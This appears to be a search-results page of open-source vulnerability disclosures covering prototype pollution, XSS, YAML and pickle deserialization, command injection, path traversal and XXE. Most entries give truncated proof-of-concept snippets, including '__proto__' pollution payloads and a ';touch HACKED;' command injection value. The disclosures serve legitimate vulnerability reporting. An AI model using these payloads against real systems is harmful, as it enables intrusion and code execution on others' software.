4057 matches found
Cross-site Scripting (XSS) - Generic in ciur/papermerge-js
:star2: Description - Papermerge is an open source document management system DMS primarily designed for archiving and retrieving your digital documents. Instead of having piles of paper documents all over your desk, office or drawers. In The Admin Upload Function. Users Are Able To Trigger...
Denial of Service in sebhildebrandt/systeminformation
Description systeminformation is vulnerable to Denial of Service. It is possible to overwrite the ping command parameters, which results in too long execution. Proof of Concept Create a .js file with the content below and run it. javascript const si = require'systeminformation'; si.inetLatency"-c...
Prototype Pollution in borderlesslabs/assign
Description @borderlesslabs/assign is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var a = require"@borderlesslabs/assign" const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " + .polluted;...
Prototype Pollution in sttk/fav-prop.set-deep
Description @fav/prop.set-deep is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js var setDeep = require"@fav/prop.set-deep" var obj = ; console.log"Before: " + .polluted; setDeepobj, "proto", "polluted", "Yes, its polluted"...
Path Traversal in rust-compress/rc-zip
:book: Description rc-zip Pure rust zip & zip64 reading and writing. this package is vulnerable for zip-slip https://github.com/rust-compress/rc-zip https://crates.io/crates/rc-zip :recycle: Steps To Reproduce-: 0 download and run latest release from https://github.com/rust-compress/rc-zip 1 run ...
Cross-site Scripting (XSS) - Generic in ciur/papermerge
:book: Description Papermerge is an open source document management system DMS primarily designed for archiving and retrieving your digital documents. Instead of having piles of paper documents all over your desk, office or drawers - you can quickly scan them and configure your scanner to directl...
Cross-site Scripting (XSS) - Generic in rilyzhang/dy-server
Description Cross Site Scripting in dy-server2 Proof of Concept 1. Install package from npm: npm i -g dy-server2 2. Create folder or file with name: 3. Start server: dy-server2 -p 8888 4. Open website and the code will execute...
Prototype Pollution in kettek/dot-dotty
Description dot-dotty is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js const DotDotty = require'dot-dotty' let obj = a: 1 let dot = DotDottyobj console.log"Before : " + .polluted; dot'proto.polluted' = 'Yes! Its Polluted'; console.log"After : " +...
Command Injection in totaljs/framework
Description Command Injection in total.js Proof of Concept 1. Create the following PoC file: // poc.js const total = require'total.js'; let image = Image.load""; let payload = ";touch HACKED;"; image.pipenull,payload; 2. Execute the following commands in terminal: npm i total.js Install affected...
Prototype Pollution in tandrewnichols/safe-obj
Description safe-obj is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js var safeObj = require"safe-obj" var obj = ; console.log"Before: " + .polluted safeObj.expandobj, "proto.polluted", true console.log"After: " + .polluted 2. Execute th...
Code Injection in ewels/multiqc
Description MultiQC Aggregate results from bioinformatics analyses across many samples into a single report. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Installation bash pip3 install multiqc Run exploit.py import os os.system'pip3 install...
Code Injection in tensorspeech/tensorflowtts
✍️ Description TensorFlowTTS provides real-time state-of-the-art speech synthesis architectures such as Tacotron-2, Melgan, Multiband-Melgan, FastSpeech, FastSpeech2 based-on TensorFlow 2. With Tensorflow 2, we can speed-up training/inference progress, optimizer further by using fake-quantize awar...
Code Injection in nosarthur/gita
✍️ Description gita helps to Manage multiple git repos with sanity. Vulnerability description Vulnerable to YAML deserialization attack caused by unsafe loading. 🕵️♂️ Proof of Concept vulnerable part of code yaml.load in getcmdsfromfiles...
Server-Side Request Forgery (SSRF) in sterlp/svg2png
:book: Description Svg2Png Manage your Icons in SVG and generate the needed PNG into your projects as needed. No "Web Service" needed, just an executable JAR file. this package is vulnerable to XXE. https://github.com/sterlp/svg2png :recycle: Steps To Reproduce-: 0 download and run latest release...
Code Injection in tensorflow/tfx
Description TensorFlow Extended TFX is a Google-production-scale machine learning platform based on TensorFlow. It provides a configuration framework to express ML pipelines consisting of TFX components. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of...
Prototype Pollution in fabiospampinato/plain-object-merge
Description plain-object-merge is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const merge = require'plain-object-merge' console.log'Before: ' + .polluted merge, JSON.parse'"proto": "polluted": true' console.log'After: ' + .polluted 2...
Prototype Pollution in geta/nestedobjectassign
Description nested-object-assign is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const assign = require'nested-object-assign' console.log'Before: ' + .polluted assign, JSON.parse'"proto": "polluted": true' console.log'After: ' +...
Prototype Pollution in fedeghe/objwun
Description objwun is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const set = require'objwun' console.log'Before: ' + .polluted set, 'proto.polluted', true console.log'After: ' + .polluted 2. Execute the following commands in the...
Prototype Pollution in grpc/grpc-node
Description grpc native core package is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var grpc =require'grpc'...
Prototype Pollution in cronvel/tree-kit
Description tree-kit is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const dotPath = require'tree-kit' console.log"Before: ", .polluted dotPath.set, 'proto.polluted', true console.log"After: ", .polluted 2. Execute the following comman...
Cross-site Scripting (XSS) - Generic in frappe/charts
Description frappe-charts is vulnerable to Cross-Site Scripting XSS due to an incomplete fix https://github.com/frappe/charts/commit/d5706a501b44fce6949216b635ed6c5e785c471d. Steps To Reproduce 1. Open the following codesandbox...
Prototype Pollution in a-maged/object-breacher
Description object-breacher is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const set = require'object-breacher' console.log'Before: ' + .polluted set, 'proto.polluted', true console.log'After: '+ .polluted 2. Execute the following...
Code Injection in tensorlayer/tensorlayer
Description TensorLayer is a novel TensorFlow-based deep learning and reinforcement learning library designed for researchers and engineers. It provides an extensive collection of customizable neural layers to build advanced AI models quickly. This package is vulnerable to Arbitrary Code Executio...
Prototype Pollution in thi-ng/umbrella
Description @thi.ng/paths is vulnerable to Prototype Pollution. The vulnerability is due to an incomplete fix. mutIn function does not have fix implemented. Proof of Concept 1. Create the following PoC file: javascript // poc.js const paths = require'@thi.ng/paths' console.log"Before: ", .pollute...
Prototype Pollution in yomguithereal/baobab
Description baobab is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const Baobab = require'baobab'; console.log'Before: ' + .polluted tree = new Baobab tree.deepMergeJSON.parse'"proto": "polluted": true' console.log'After: ' + .polluted...
Prototype Pollution in alexandervu/dot-prop-opt
Description dot-prop-opt is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const set = require'dot-prop-opt' console.log'Before: ' + .polluted set, 'proto.polluted', true console.log'After: ' + .polluted 2. Execute the following commands...
Prototype Pollution in js-data/js-data
Description js-data is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js const js = require"js-data"; const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " + .polluted; js.utils.deepMixInobj, payload;...
Prototype Pollution in indlekofer/object_set
Description Prototype Pollution in @indlekofer/objectset Proof of Concept 1. Create the following PoC file: // poc.js var objectSet = require"@indlekofer/objectset" var obj = console.log"Before : " + .polluted; objectSet.defaultobj,"proto","polluted","Yes! Its Polluted"; console.log"After : " +...
Prototype Pollution in quernest/arr-flatten-unflatten
Description arr-flatten-unflatten is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var arrFlattenUnflatten = require"arr-flatten-unflatten" console.log"Before : " + .polluted; arrFlattenUnflatten.unflatten'protopolluted': 'Yes! Its Polluted';...
Prototype Pollution in xiaoyifan6/json-glat
Description json-glat is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var jsonGlat = require"json-glat" console.log"Before : " + .polluted; jsonGlat.parse'proto.polluted': 'Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute the...
Prototype Pollution in dominictarr/libnested
Description libnested is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var libnested = require"libnested" var obj = console.log"Before : " + .polluted; libnested.setobj, 'proto','polluted', 'Yes! Its Polluted'; console.log"After : " + .polluted; 2...
Prototype Pollution in danieldelcore/object-deep-key
Description object-deep-key is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const objDeepKey = require'object-deep-key'.default console.log'Before: ', .toString objDeepKeyconstructor.prototype, 'toString'.set'function prototype pollute...
Prototype Pollution in react-atomic/react-atomic-organism
Description set-object-value is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var setObjectValue = require"set-object-value" var obj = console.log"Before : " + .polluted; setObjectValueobj, 'proto','polluted', 'Yes! Its Polluted'; console.log"Afte...
Prototype Pollution in lukeed/dset
Description dset is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var dset = require"dset" var obj = console.log"Before : " + .polluted; dsetobj, 'proto.polluted', 'Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute the following...
Prototype Pollution in allgay/jsonuri
Description jsonuri is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js const set = require'jsonuri' var obj = console.log"Before : " + .polluted; set, 'proto/polluted', 'Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute the following...
Prototype Pollution in babak-gholamzadeh/deeply-object-assign
Description deeply-object-assign is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var deeplyObjectAssign = require"deeply-object-assign" const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " +...
Code Injection in facebookresearch/parlai
Description ParlAI pronounced “par-lay” is a python framework for sharing, training and testing dialogue models, from open-domain chitchat to VQA Visual Question Answering. Vulnerability description Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Run exploit.p...
Code Injection in baidu/cup
Description CUP, common useful python-lib. Currently, Most popular python lib in baidu Vulnerability description untrusted loading of data by the pickle.load function leading to Arbitrary code execution. Proof of Concept Run exploit.py import os import pickle os.system'pip3 install cup' from...
Code Injection in spotify/postgresql-metrics
Description Tool that extracts and provides metrics on your PostgreSQL database Vulnerability discription unsafe loading of data by the yaml.load function leading to Arbitrary code execution. Proof of Concept Vulnerable code part python readconfigdict = yaml.loadf...
Prototype Pollution in x-extends/xe-utils
Description xe-utils is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const set = require'xe-utils' console.log'Before: ', .polluted set, 'proto.polluted', true console.log'After: ', .polluted 2. Execute the following commands in the...
Code Injection in archivy/archivy
Description Archivy is a self-hosted knowledge repository that allows you to safely preserve useful content that contributes to your knowledge bank. Vulnerability description Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Run exploit.py python import os...
Prototype Pollution in robinvdvleuten/shvl
Description shvl is vulnerable to Prototype Pollution. This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior using a proto payload, which may result in Sensitive Information Disclosure/Denial of ServiceDoS/Remote Code Execution. Proof of...
Cross-site Scripting (XSS) - Generic in kekingcn/kkfileview
Description kkFileView this package is vulnerable to Stored Cross-Site Scripting XSS. https://github.com/kekingcn/kkFileView Steps To Reproduce-: stored XSS 1 install https://github.com/kekingcn/kkFileView locally or https://file.keking.cn/index use demo 2 while uploading files for preview use js...
in catalyst-team/catalyst
Description Catalyst is a PyTorch framework for Deep Learning research and development. It focuses on reproducibility, rapid experimentation, and codebase reuse so you can create something new rather than write another regular train loop. This package was vulnerable to Arbitrary code execution vi...
Prototype Pollution in darrenpaulwright/object-agent
Description object-agent is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js import set from 'object-agent'; var obj = console.log"Before : " + .polluted; setobj, 'proto.polluted', 'Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute th...
Prototype Pollution in ionicabizau/obj-def
Description obj-def is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var objDef = require"obj-def" var obj = console.log"Before : " + .polluted; objDefobj, "proto", .polluted ='Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute the...
Code Injection in uber/petastorm
Description Petastorm is an open source data access library developed at Uber ATG. This library enables single machine or distributed training and evaluation of deep learning models directly from datasets in Apache Parquet format. Petastorm supports popular Python-based machine learning ML...
Cross-site Scripting (XSS) - Generic in netlify/netlify-cms
Description netlify-cms-widget-markdown is vulnerable to Cross-Site Scripting XSS. Steps To Reproduce 1. Use the application or use the demo https://cms-demo.netlify.com//collections/posts/new 2. Switch to markdown mode in edtior. 3. Insert the xss payload in to the editorbody 4. XSS payload will...
Prototype Pollution in yowainwright/common-utilities
Description @common-utilities/merge-objects is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var a = require"@common-utilities/merge-objects" const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " +...
Code Injection in apolloauto/apollo
Description Arbitrary Code Excecution in genprotofile.py in ApolloAuto/Apollo. An open autonomous driving platform. Technical Description This package was vulnerable to Arbitrary code execution due to a use of a known vulnerable function load in yaml. fix is to be done genprotofile.py Exploit cod...